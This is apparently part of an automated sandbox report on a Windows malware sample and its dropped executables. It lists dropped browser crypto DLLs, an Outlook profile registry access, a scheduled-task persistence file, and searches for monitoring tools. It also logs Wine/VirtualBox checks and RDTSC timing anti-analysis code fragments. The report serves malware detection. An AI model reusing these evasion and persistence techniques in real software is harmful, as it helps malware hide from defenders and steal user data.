Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: 1jPL5zru3u.exe Static file information: File size 2509824 > 1048576
Source: 1jPL5zru3u.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x221800
Source: Binary string: mozglue.pdbP source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889617051.000000006C5FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 1jPL5zru3u.exe, 00000000.00000002.1889326037.000000006C43D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Unpacked PE file: 0.2.1jPL5zru3u.exe.cb0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Unpacked PE file: 6.2.CAEHDBAAEC.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ltpqnbtv:EW;vtlswbyt:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C42C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.6.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
Source: CAEHDBAAEC.exe.0.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
Source: 1jPL5zru3u.exe Static PE information: real checksum: 0x0 should be: 0x27164b
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d98f3 should be: 0x1d947d
PE file contains sections with non-standard names
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: 1jPL5zru3u.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: ltpqnbtv
Source: amadka[1].exe.0.dr Static PE information: section name: vtlswbyt
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .idata
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name:
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: ltpqnbtv
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: vtlswbyt
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: ltpqnbtv
Source: explorti.exe.6.dr Static PE information: section name: vtlswbyt
Source: explorti.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB536 push ecx; ret 0_2_6C3FB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BBD82C push ecx; ret 10_2_00BBD83F
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.9949641655914805
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.980309777125587
Source: 1jPL5zru3u.exe Static PE information: section name: entropy: 7.952939990721896
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.986751932687439
Source: amadka[1].exe.0.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: entropy: 7.986751932687439
Source: CAEHDBAAEC.exe.0.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Source: explorti.exe.6.dr Static PE information: section name: entropy: 7.986751932687439
Source: explorti.exe.6.dr Static PE information: section name: ltpqnbtv entropy: 7.954413897969609
Drops PE files
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\1jPL5zru3u.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C4255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C4255F0
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 723E59 second address: 723E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 723E65 second address: 723E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2AD second address: 71C2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2B1 second address: 71C2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71C2B5 second address: 71C2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72505C second address: 725060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725060 second address: 72506E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB424542846h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72506E second address: 72507A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72507A second address: 725095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB42454284Eh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725095 second address: 7250B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7250B5 second address: 7250B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72517E second address: 725186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725186 second address: 7251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FB42454284Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB424542846h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7252F9 second address: 725301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725301 second address: 72535E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542853h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jno 00007FB42454285Bh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FB424542856h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 72535E second address: 725364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725364 second address: 725368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725456 second address: 7254B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4246CBDE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e sub dword ptr [ebp+122D307Ah], eax 0x00000014 jmp 00007FB4246CBDEAh 0x00000019 popad 0x0000001a lea ebx, dword ptr [ebp+12459FCAh] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FB4246CBDE8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a push ebx 0x0000003b sub esi, 6819887Ah 0x00000041 pop edi 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB4246CBDECh 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7254B5 second address: 7254BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 725599 second address: 7255B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FB4246CBDECh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B1 second address: 7255B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7255B5 second address: 7255B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
